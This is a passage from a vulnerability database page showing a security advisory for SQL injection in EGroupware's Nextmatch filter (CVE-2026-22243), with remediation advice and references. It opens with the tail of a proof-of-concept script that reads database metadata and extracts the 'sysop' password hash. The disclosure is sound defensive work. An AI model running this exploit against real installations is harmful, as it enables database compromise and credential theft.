\")\n            print(\"=\"*40)\n            print(f\"[+] DB Version: {run_query(eid, \u0027SELECT @@version\u0027)}\")\n            print(f\"[+] DB Name:    {run_query(eid, \u0027SELECT database()\u0027)}\")\n            print(f\"[+] DB User:    {run_query(eid, \u0027SELECT user()\u0027)}\")\n            \n            print(\"\\n[*] Retrieving hash for \u0027sysop\u0027 user (if exists):\")\n            res = run_query(eid, \"SELECT CONCAT(account_lid,\u0027:\u0027,account_pwd) FROM egw_accounts WHERE account_lid=\u0027sysop\u0027\")\n            print(f\" \u003e {res}\")\n            print(\"=\"*40 + \"\\n\")\n```\n\n**Proof of Verification** on [demo.egroupware.net](http://demo.egroupware.net/): \n\nThe script was executed against ther public demo to confirm exploitability in a production-like environment (read-only).\n\u003cimg width=\"773\" height=\"393\" alt=\"image\" src=\"https://github.com/user-attachments/assets/ae97ea37-21fa-4718-98f5-f7f9696f3c2e\" /\u003e\n\n**Impact:**\nAttackers with low-privileged access can fully compromise the database. This allows for:\n* **Confidentiality Loss:** Reading sensitive data (e.g., password hashes, session tokens, personal contact details, configuration secrets).\n* **Integrity Loss:** Modifying or deleting arbitrary data within the application.\n* **Availability Loss:** Potential to drop tables or corrupt data.\n\n### Remediation\n**1. Input Validation (Whitelisting)**\nDo not rely solely on `is_int()` for security decisions when handling external input, especially JSON data where keys can be numeric strings. Implement a strict **whitelist (allowlist)** of allowed column names for filtering in `Nextmatch` widgets. If the key/column is not in the whitelist, reject the request.\n\n**2. Parameter Binding**\nEnsure all filter values are bound as parameters (prepared statements) rather than being concatenated directly into the SQL string.\n\n**3. Strict Type Checking**\nWhen processing JSON input, ensure that keys are strictly checked against expected types (e.g., using `===` for strict comparison or `filter_var`) before being used in SQL generation logic.\n\n\n### Credits\n\nReported by \u0141ukasz Rybak",
  "id": "GHSA-rvxj-7f72-mhrx",
  "modified": "2026-01-28T20:39:27Z",
  "published": "2026-01-28T20:39:27Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/EGroupware/egroupware/security/advisories/GHSA-rvxj-7f72-mhrx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22243"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/EGroupware/egroupware"
    },
    {
      "type": "WEB",
      "url": "https://github.com/EGroupware/egroupware/releases/tag/23.1.20260113"
    },
    {
      "type": "WEB",
      "url": "https://github.com/EGroupware/egroupware/releases/tag/26.0.20260113"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "EGroupware has SQL Injection in Nextmatch Filter Processing"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-22243 (GCVE-0-2026-22243)

FKIE_CVE-2026-22243

GHSA-RVXJ-7F72-MHRX

Summary

Details

PoC

Remediation

Credits

Tags

Sightings

Nomenclature